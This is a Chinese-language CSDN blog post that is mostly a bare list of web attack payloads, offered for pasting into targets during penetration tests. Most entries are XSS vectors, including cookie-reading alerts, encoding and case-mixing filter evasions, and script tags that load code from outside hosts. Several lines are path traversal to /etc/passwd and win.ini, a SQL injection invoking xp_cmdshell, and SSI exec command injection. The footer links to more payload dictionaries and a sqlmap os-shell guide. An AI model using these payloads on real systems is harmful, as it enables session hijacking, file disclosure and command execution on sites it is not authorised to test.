xss payload大全(实用)

最新推荐文章于 2024-03-06 10:00:59 发布
最新推荐文章于 2024-03-06 10:00:59 发布
阅读量2.9w 收藏 50
点赞数 9
分类专栏: 渗透测试总结的方法 文章标签: xss payload 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bul1et/article/details/86652232
版权

验证xss的时候总感觉姿势不够

这下好了   这么多  任你随便插

'><script>alert(document.cookie)</script>
 ='><script>alert(document.cookie)</script>
 <script>alert(document.cookie)</script>
 <script>alert(vulnerable)</script>
 %3Cscript%3Ealert('XSS')%3C/script%3E
 <script>alert('XSS')</script>
 <img src="javascript:alert('XSS')">
 %0a%0a<script>alert(\"Vulnerable\")</script>.jsp
 %22%3cscript%3ealert(%22xss%22)%3c/script%3e
 %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
 %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
 %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
 %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
 %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
 %3f.jsp
 %3f.jsp
 <script>alert('Vulnerable');</script>
 <script>alert('Vulnerable')</script>
 ?sql_debug=1
 a%5c.aspx
 a.jsp/<script>alert('Vulnerable')</script>
 a/
 a?<script>alert('Vulnerable')</script>
 "><script>alert('Vulnerable')</script>
 ';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&
 %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 %3Cscript%3Ealert(document. domain);%3C/script%3E&
 %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
 <IMG src="javascript:alert('XSS');">
 <IMG src=javascript:alert('XSS')>
 <IMG src=JaVaScRiPt:alert('XSS')>
 <IMG src=JaVaScRiPt:alert("XSS")>
 <IMG src=javascript:alert('XSS')>
 <IMG src=javascript:alert('XSS')>
 <IMG src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
 <IMG src="jav ascript:alert('XSS');">
 <IMG src="jav ascript:alert('XSS');">
 <IMG src="jav ascript:alert('XSS');">
 "<IMG src=java\0script:alert(\"XSS\")>";' > out
 <IMG src=" javascript:alert('XSS');">
 <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
 <BODY BACKGROUND="javascript:alert('XSS')">
 <BODY ONLOAD=alert('XSS')>
 <IMG DYNSRC="javascript:alert('XSS')">
 <IMG LOWSRC="javascript:alert('XSS')">
 <BGSOUND src="javascript:alert('XSS');">
 <br size="&{alert('XSS')}">
 <LAYER src="http://xss.ha.ckers.org/a.js"></layer>
 <LINK REL="stylesheet" href="javascript:alert('XSS');">
 <IMG src='vbscript:msgbox("XSS")'>
 <IMG src="mocha:[code]">
 <IMG src="livescript:[code]">
 <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
 <IFRAME src=javascript:alert('XSS')></IFRAME>
 <FRAMESET><FRAME src=javascript:alert('XSS')></FRAME></FRAMESET>
 <TABLE BACKGROUND="javascript:alert('XSS')">
 <DIV STYLE="background-image: url(javascript:alert('XSS'))">
 <DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">
 <DIV STYLE="width: expression(alert('XSS'));">
 <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
 <IMG STYLE='xss:expre\ssion(alert("XSS"))'>
 <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
 <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A class="XSS"></A>
 <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
 <BASE href="javascript:alert('XSS');//">
 getURL("javascript:alert('XSS')")
 a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);
 <XML src="javascript:alert('XSS');">
 "> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"
 <SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
 <IMG src="javascript:alert('XSS')"
 <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"-->
 <IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
 <SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
 <SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
 <SCRIPT a=">" '' src="http://xss.ha.ckers.org/a.js"></SCRIPT>
 <SCRIPT "a='>'" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
 <SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://xss.ha.ckers.org/a.js"></SCRIPT>

 

冲冲_冲
关注
  • 9
    点赞
  • 50
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
XSS字典大全.rar
04-17
收集的XSS字典,一共四本,分别为简单版本,普通版本,大字典,超大字典。适合FUZZXSS漏洞。与burp配合使用。工具仅限于测试,请不要用于非法操作,因字典导致法律问题与本人无关
XSS测试payload
09-19
XSS测试payload,收集了简单的XSS测试用例,较具有实用性。
渗透测试 漏洞xss payload大全
12-04
8k加语句,一次插个爽
XSSpayload 常用构造和变形方法
最新发布
吉吉的博客
03-06 676
XSS 相关 payload 构造和变形的常用方法。
XSS通关实战
m0_55563900的博客
03-10 331
XSS基础 跨站脚本(Cross -Site Scripting,简称为XSS或跨站脚本或跨站脚本攻击)是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。它允许恶意用户将代码注入网页,其他用户在浏览网页时就会受到影响。恶意用户利用XSS代码攻击成功后,可能层到很高的权限(如执行一些操作)、 私密网页内容、 会话和cookie等各种内容。 XSS攻击可以分为三种:反射型、存储型和DOM型。 反射型 反射型XSS又称非持久型XSS,这种攻击方式往往具有一次性。、 攻击方式:攻击者通过电子邮件等方式将包
XSS payload大全
01-22
总结的XSSpayload,可以直接使用,直接进行攻击,各种payload
XSS payload (大集合)
m0_51186260的博客
10-18 2794
<script>alert(/xss/)</script> <script>alert(&#38;XSS&#38;)</script> <script>alert(&quot;XSS&quot;)</script>(代替被转义的“”) <INPUT type="text"value='\'><SCRIPT>alert(String.fromCharCode(88,83,83))&l
XSS-Payload大全
gy1bubble的博客
10-11 1282
<body oninput=javascript:alert(1)><input autofocus> <math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKM.
XSS Playload 学习浏览器解码
lml_0916的博客
07-25 1196
通过网上的编码解析器可以查到“%6a%61%76%61%73%63%72%69%70%74%61%6c%65%72%74%28%31%29”这里采用URL编码的方式将javascriptalert(1)转成了上面的样子。js能识别的是Unicode编码,也能识别16进制编码,但是在js中不可以编码符号,所以这个也是不可以识别的,也就是说,咱们点击button按钮的时候是不会跳出弹窗的。这里采用的是js编码,使用的js的Unicode,并且他没有编码符号,所以是可以进行弹窗的。...
xss常用Payload总结
csd_ct的专栏
01-03 1万+
xss常用Payload总结 渗透测试时,常遇到页面输入框、留言板等输入交互点,大多是xss漏洞易出现的常见场景之一,记录几种常用的xss注入的姿势 1.img 注入 快速探测是否存在xss 1) <img src='x' onerror='alert(1)'> 2) <img src='x' onerror="eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))"> 2.iframe 注入 后台做了相
xss payload
07-15 371
'><script>alert(document.cookie)</script>='><script>alert(document.cookie)</script><script>alert(document.cookie)</script><script>alert(vulnerab...
2020年仍然有效的一些XSS Payload
11-05
2020年仍然有效的一些XSS Payload
xss常见payload脚本
09-01
xsspayload包括各种标签的payload,类似于字典。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。
xss payload下载
04-03
多达5500多条xss payload提供下载,方便渗透测试人员更好地fuzz目标站点,检测xss漏洞是否存在
xss的各种payload脚本
08-12
xss 各种绕waf脚本语句
sqlmap的--os-shell玩法
热门推荐
Bul1et的博客
12-25 1万+
首先找到注入点 证明存在注入漏洞 然后使用命令 sqlmap.py -r D:\1.txt -p username --random-agent --is-dba 看看是不是dba 这里不是dba所以不能使用--os-shell命令 如果是的话 例如 python sqlmap.py -u http://192.168.0.166/php/newsshow.php?cid=4 -...
设置微信PC端代理使用burp抓取微信小程序的数据包
Bul1et的博客
04-22 1万+
MSF简单的使用教程
Bul1et的博客
10-24 9775
Kali自带MSF工具 假如此时nessus扫到了主机漏洞  比如ms.... 启动msf msfconsole 2.secrch ms模块 找到模块  使用模块 查看模块需要的命令   ip或者端口 使用set命令进行设置  ip或者端口 然后使用run命令  开始验证 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值